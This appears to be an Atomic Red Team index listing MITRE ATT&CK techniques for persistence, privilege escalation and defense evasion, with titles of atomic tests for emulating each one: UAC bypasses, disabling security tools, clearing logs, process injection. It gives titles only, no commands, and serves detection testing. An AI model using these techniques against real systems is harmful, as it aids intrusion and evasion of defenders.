- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [linux, macos]
- Atomic Test #2: CreateCronjob [linux, macos]
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [linux]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1610 Deploy Container](../../T1610/T1610.md)
- Atomic Test #1: Deploy container using nsenter container escape [linux]
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
- Atomic Test #3: Impair Windows Audit Log Policy [windows]
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable firewall [linux]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #3: Install root CA on macOS [macos]
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.005 Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
